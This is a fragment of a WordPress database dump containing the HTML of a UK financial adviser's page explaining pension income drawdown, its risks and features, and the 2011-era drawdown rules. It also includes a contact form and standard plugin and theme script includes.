current-menu-item page_item page-item-137 current_page_item menu-item-139\"><a href=\"/pensions/income-drawdown\">Income Drawdown</a></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852\"><a>More Information</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"/tracking-down-your-lost-pension\">Lost Pension</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47\"><a href=\"/investments\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"isas\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"lump-sum-investment\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"offshore-bonds\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"unit-trusts-oeics\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46\"><a href=\"/trusts\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"/asset-protection-trust\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"/discretionary-trusts\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"/absolute-trusts\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"/gift-loan-schemes\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"/wills-and-trust\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381\"><a href=\"/insurance-protection\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"/critical-illness-insurance-2-0\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"/serious-illness-cover\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"/relevant-life-plan\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"/life-insurance\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"/business-protection-insurance\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n		</ul></nav></div>&#13;\n	</header></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n									</div>&#13;\n					<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Income Drawdown										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"/pensions\" title=\"Pensions\">Pensions</a></li><li>Income Drawdown</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n													<div id=\"main\" class=\"\" style=\"overflow:hidden !important;\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n				<div id=\"content\" class=\"full-width\">&#13;\n				<div id=\"post-137\" class=\"post-137 page type-page status-publish hentry\">&#13;\n			<span class=\"entry-title\" style=\"display: none;\">Income Drawdown</span>&#13;\n			<span class=\"updated\" style=\"display: none;\">June 19th, 2017</span>&#13;\n			<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"/author/rs-r-admin\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span></span>&#13;\n						<div class=\"post-content\">&#13;\n				<div class=\"wpb_row vc_row-fluid \"> &#13;\n	<div class=\"vc_span6 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<p style=\"text-align: center;\">When you retire, you don’t have to go down the route of purchasing your pension known as an annuity. You can consider Income or Pension Drawdown</p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<p><span style=\"color: #99cc00; font-family: tahoma,geneva,sans-serif; font-size: large;\">Income Drawdown</span></p>&#13;\n<p>For many people who have spent a large portion of their working life (if not it all) paying into a pension, you may be unhappy to know an annuity provider could end up keeping hold of your money if you die in the early years.</p>&#13;\n<p>There is an alternative to purchasing a pension on retirement which allows your pension to remain invested and for you to take a portion from the pot each year as an income, hence the phrase ‘Income Drawdown’.</p>&#13;\n<p>Income Drawdown, which from April 2006 became known officially as  Unsecured Pension  and from April 2011 will be known as Capped Drawdown and Flexible Drawdown– has the advantage of possibly leaving your family some legacy when you die, as your pension pot (after a tax of 55%) passes on to your family according to your wishes.</p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span6 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<div class=\"dashed-green-box\" style=\"width: 80%; margin: 0px auto 20px;\">&#13;\n<div class=\"wpcf7\" id=\"wpcf7-f447-p137-o1\"><form action=\"../../pensions/income-drawdown/\" method=\"post\" class=\"wpcf7-form\" novalidate=\"novalidate\">&#13;\n<div style=\"display: none;\">&#13;\n<input type=\"hidden\" name=\"_wpcf7\" value=\"447\"/><input type=\"hidden\" name=\"_wpcf7_version\" value=\"3.7\"/><input type=\"hidden\" name=\"_wpcf7_locale\" value=\"\"/><input type=\"hidden\" name=\"_wpcf7_unit_tag\" value=\"wpcf7-f447-p137-o1\"/><input type=\"hidden\" name=\"_wpnonce\" value=\"62d9de1987\"/></div>&#13;\n<p>Your Name *<br/><span class=\"wpcf7-form-control-wrap your-name\"><input type=\"text\" name=\"your-name\" value=\"\" size=\"40\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\"/></span> </p>&#13;\n<p>Your Tel No.*<br/><span class=\"wpcf7-form-control-wrap text-533\"><input type=\"text\" name=\"text-533\" value=\"\" size=\"40\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\"/></span> </p>&#13;\n<p>Your Email *<br/><span class=\"wpcf7-form-control-wrap your-email\"><input type=\"email\" name=\"your-email\" value=\"\" size=\"40\" class=\"wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email\" aria-required=\"true\" aria-invalid=\"false\"/></span> </p>&#13;\n<p>What would you like to speak to us about?<br/><span class=\"wpcf7-form-control-wrap menu-478\"><select name=\"menu-478\" class=\"wpcf7-form-control wpcf7-select\" aria-invalid=\"false\"><option value=\"Pensions\">Pensions</option><option value=\"Investments\">Investments</option><option value=\"Trusts\">Trusts</option><option value=\"Insurance Protection\">Insurance Protection</option><option value=\"Wealth\">Wealth</option><option value=\"Other\">Other</option></select></span></p>&#13;\n<p>Message<br/><span class=\"wpcf7-form-control-wrap Message\"><textarea name=\"Message\" cols=\"31\" rows=\"3\" class=\"wpcf7-form-control wpcf7-textarea\" aria-invalid=\"false\"/></span></p>&#13;\n<p><input type=\"submit\" value=\"Submit\" class=\"wpcf7-form-control wpcf7-submit\"/></p>&#13;\n<div class=\"wpcf7-response-output wpcf7-display-none\"/></form></div>&#13;\n</div>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div> <div class=\"wpb_row vc_row-fluid \"> &#13;\n	<div class=\"vc_span4 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<p style=\"text-align: center;\"><a href=\"#\"/>   I am text block. Click edit button to change this text.</p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span4 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<p style=\"text-align: center;\"><a href=\"#\"/></p>&#13;\n<p style=\"text-align: center;\">I am text block. Click edit button to change this text.</p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span4 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<p style=\"text-align: center;\"><a href=\"#\"/></p>&#13;\n<p style=\"text-align: center;\">I am text block. Click edit button to change this text.</p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div> <div class=\"wpb_row vc_row-fluid \"> &#13;\n	<div class=\"vc_span12 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_tabs wpb_content_element \" data-interval=\"0\">&#13;\n		<div class=\"wpb_wrapper wpb_tour_tabs_wrapper ui-tabs clearfix\">&#13;\n			<ul class=\"clearfix ui-tabs-nav\"><li><a href=\"#tab-1369830018-1-79\">The Risks</a></li><li><a href=\"#tab-1369830018-2-37\">Main Features</a></li><li><a href=\"#tab-1369830107024-3-4\">Before 6th April 2011</a></li><li><a href=\"#tab-1369830121553-4-3\">How Does It Work?</a></li></ul><div id=\"tab-1369830018-1-79\" class=\"wpb_tab wpb_row vc_row-fluid ui-tabs-panel wpb_ui-tabs-hide clearfix\">&#13;\n				 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<p>However, there are risks with opting for Income Drawdown.</p>&#13;\n<ul type=\"disc\"><li>Your income is not guaranteed for life: you only have an income so long as you have a pension pot, so if you empty your pot you will face later retirement with a much reduced income.</li>&#13;\n</ul><ul type=\"disc\"><li>As well as this, because your pension remains invested, the value of it could go down – at a time when you’re probably not in a position to “replace” this loss with new money.</li>&#13;\n</ul><p>Principally, a Pension Drawdown plan allows you to unlock the tax-free cash from your pension plans without taking out an annuity. You retain ownership of the funds and the funds continue to be invested. A pension drawdown is an alternative to an annuity which gives greater flexibility.</p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n			</div>  &#13;\n			<div id=\"tab-1369830018-2-37\" class=\"wpb_tab wpb_row vc_row-fluid ui-tabs-panel wpb_ui-tabs-hide clearfix\">&#13;\n				 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<p>The main features of a Pension Drawdown plan are:</p>&#13;\n<ul><li>You can take a 25% tax-free lump sum from age 55</li>&#13;\n<li>You can take an income between 0 and 100% of the rate set by the Government Actuaries Department (GAD). More information can be given by one of our advisers on this complicated method of calculating the level of income.</li>&#13;\n<li>The income you withdraw can be varied at any time up to the maximum amount to suit your needs or control your tax liabilities</li>&#13;\n<li>The maximum income is reviewed and recalculated every three years currently</li>&#13;\n<li>You can transfer any number of pension plans (personal and occupational) to one single income drawdown plan</li>&#13;\n<li>You retain ownership of your pension fund and control of your investment</li>&#13;\n<li>Choice of death benefits for dependents</li>&#13;\n<li>Your Spouse can receive 100% of your fund on your death</li>&#13;\n</ul></div> &#13;\n	</div>  &#13;\n			</div>  &#13;\n			<div id=\"tab-1369830107024-3-4\" class=\"wpb_tab wpb_row vc_row-fluid ui-tabs-panel wpb_ui-tabs-hide clearfix\">&#13;\n				 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<p>Income Drawdown Plans in place before 6 April 2011</p>&#13;\n<p>If you started an Income Drawdown plan before 6 April 2011, you will have to convert to the new rules, or purchase an annuity.  There are transitional rules in place, giving you a deadline to do this.</p>&#13;\n<p>The new income drawdown rules are as follows:</p>&#13;\n<ul><li>There is no minimum amount of income that must be drawn, irrespective of age. This means that individuals may be able to leave their pension fund untouched for as long as they like, without the necessity to drawing any income.</li>&#13;\n<li>The maximum amount of income that may be drawn is reducing. The new maximum amount of income that may be drawn is 100% of the single life annuity that somebody of the same sex and age could purchase based on Government Actuary’s Department rates. An individual’s pension provider calculates the maximum income, using standard tables prepared by the Government Actuary’s Department (GAD).</li>&#13;\n<li>The maximum income will generally be reviewed every three years until age 75 and annually from age 75, based on the Government Actuary’s Department rates for an individual of the same age at the time of each review.</li>&#13;\n<li>Tax-free cash lump sums may now be paid after age 75 where an individual has elected to set aside or ‘designate’ funds for income drawdown at the same time, even if they decide to take no income.</li>&#13;\n</ul><p>If you are considering using income drawdown or delaying taking your tax-free cash lump sum and starting your pension after age 75, your Equity SMART adviser will check whether your pension provider is offering these options, and help you make the right decision.</p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n			</div>  &#13;\n			<div id=\"tab-1369830121553-4-3\" class=\"wpb_tab wpb_row vc_row-fluid ui-tabs-panel wpb_ui-tabs-hide clearfix\">&#13;\n				 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<p>How does Income Drawdown work?</p>&#13;\n<p>Income Drawdown plans allow you to take benefits  (tax-free cash and an income) from your pension funds without buying an annuity. From April 2010, the minimum age that you are able to take benefits is 55 (previously 50).</p>&#13;\n<p>Income Drawdown (or Capped Drawdown and Flexible Drawdown) allows you to take benefits from your pension before the normal retirement age of 60 or 65, (sometimes referred to as “unlocking your tax free cash). Some people want to unlock their tax free cash early to use the funds to clear debts or repay a mortgage and the present rules allow you to do this from age 55. You do not have to stop work in order to take your benefits. You must bear in mind though, that by taking the tax-free cash (and any income) early you are reducing the funds available for you when you retire.</p>&#13;\n<p>From the time of taking benefits (known as crystallising your fund) you can use Pension Drawdown to take both tax-free cash and an income. The fund remaining after taking tax-free cash is still invested as a pension fund, continuing to benefit from a tax efficient environment in the same way that it did prior to taking any benefits.</p>&#13;\n<p>As always you must consider both the advantages and disadvantages of Income Drawdown.</p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n			</div>  &#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div> <div class=\"wpb_row vc_row-fluid \"> &#13;\n	<div class=\"vc_span6 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<p>Advantages</p>&#13;\n<ul><li>Access to tax-free cash immediately</li>&#13;\n<li>Flexibility to vary your income according to your requirements</li>&#13;\n<li>Control the level of income tax you pay</li>&#13;\n<li>Control of your investment</li>&#13;\n<li>Funds benefit from investment growth in a tax-efficient environment</li>&#13;\n<li>Choice not to purchase an annuity</li>&#13;\n<li>Option to take unlimited amounts if you meet the MIR (see Flexible Drawdown)</li>&#13;\n<li>Choice of death benefits for dependents</li>&#13;\n</ul></div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span6 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<p>Disadvantages</p>&#13;\n<ul><li>Future investment returns are not guaranteed</li>&#13;\n<li>High withdrawals of income may not be sustainable</li>&#13;\n<li>The higher the level of income withdrawal chosen the less that may be available to provide for dependants</li>&#13;\n<li>Increased flexibility brings increased administration costs</li>&#13;\n<li>The level of income may change due to the reviews</li>&#13;\n</ul></div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div> <div class=\"wpb_row vc_row-fluid \"> &#13;\n	<div class=\"vc_span12 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 <div class=\"wpb_call_to_action wpb_content_element clearfix cta_align_right\"><a class=\"wpb_button_a\" href=\"/contact-us\"><span class=\"wpb_button  wpb_btn-success wpb_btn-large\">Contact Us Now</span></a><h2 class=\"wpb_call_text\">Speak to Equity SMART about Income Drawdown and we will help you decide if this is an appropriate option for you.</h2></div> &#13;\n &#13;\n		</div> &#13;\n	</div> &#13;\n </div>&#13;\n							</div>&#13;\n					</div>&#13;\n			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"/seven-deadly-investment-sins\">The Seven Deadly Investment Sins</a>&#13;\n							<span class=\"post-date\">February 10, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/mortgage-strategic-alliance\">Mortgage Strategic Alliance</a>&#13;\n							<span class=\"post-date\">February 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/esmart-money-januaryfebruary-2014-issue\">eSmart Money January/February 2017 issue</a>&#13;\n							<span class=\"post-date\">January 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/how-much-money-can-i-get-pension\">How much Money can I get out of my Pension?</a>&#13;\n							<span class=\"post-date\">October 31, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/what-does-a-wealth-managerdo\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"/portfolio-items/smart-money-nov-dec\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n						<a href=\"/portfolio-items/critical-illness-guide\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n						<a href=\"/portfolio-items/guide-auto-enrolment\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n						<a href=\"/\" title=\"Investing For Income\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"/><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"/maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><link rel=\"stylesheet\" id=\"js_composer_front-css\" href=\"/wp-content/plugins/js_composer/assets/css/js_composer_front.css\" type=\"text/css\" media=\"screen\"/><link rel=\"stylesheet\" id=\"ui-custom-theme-css\" href=\"/wp-content/plugins/js_composer/assets/ui-custom-theme/jquery-ui-less.custom.css\" type=\"text/css\" media=\"screen\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/main-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/js_composer/assets/js_composer_front.js\"/><script type=\"text/javascript\" src=\"/wp-includes/js/jquery/ui/jquery.ui.core.min.js\"/><script type=\"text/javascript\" src=\"/wp-includes/js/jquery/ui/jquery.ui.widget.min.js\"/><script type=\"text/javascript\" src=\"/wp-includes/js/jquery/ui/jquery.ui.tabs.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/js_composer/assets/jquery-ui-tabs-rotate/jquery-ui-tabs-rotate.js\"/></body>','Income Drawdown','Income drawdown is an alternative to purchasing a pension on retirement. It lets you keep your pension invested and take a cash income each year.','publish','closed','closed','','income-drawdown','','','2017-09-21 16:34:32','2017-09-21 16:34:32','',0,'http://www.equalitywalk.org.uk/income-drawdown',0,'page','',0),(74,1,'2017-09-21 16:34:33','2017-09-21 16:34:33','<body class=\"page page-id-32 page-template page-template-full-width-php light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		<div class=\"header-social\">&#13;\n		<div class=\"avada-row\">&#13;\n			&#13;\n			<div class=\"alignright\">&#13;\n				<div class=\"top-menu\">&#13;\n	<ul id=\"snav\" class=\"menu\"><li id=\"menu-item-4739\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4739\"><a href=\"/\">Home</a></li>&#13;\n<li id=\"menu-item-4811\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-4811\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-5319\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-5319\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-6369\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6369\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-6489\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6489\"><a href=\"../resources/\">Resources</a></li>&#13;\n<li id=\"menu-item-5417\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-5417\"><a href=\"../our-blog/\">Blog</a></li>&#13;\n<li id=\"menu-item-6142\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-6142\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n<li id=\"menu-item-4746\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4746\"><a href=\"../contact-us/\">Contact</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-6358\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6358\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-6359\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6359\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-6357\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6357\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n			</ul></div>			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul id=\"nav\" class=\"menu\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27\"><a href=\"../pensions/\">Pensions</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\">Pension Release</a></li>&#13;\n	<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\">Pension Transfer</a></li>&#13;\n	<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\">Auto Enrolment Pensions</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\">Auto Enrolment Report</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pension-review/\">Pension Review</a></li>&#13;\n	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a 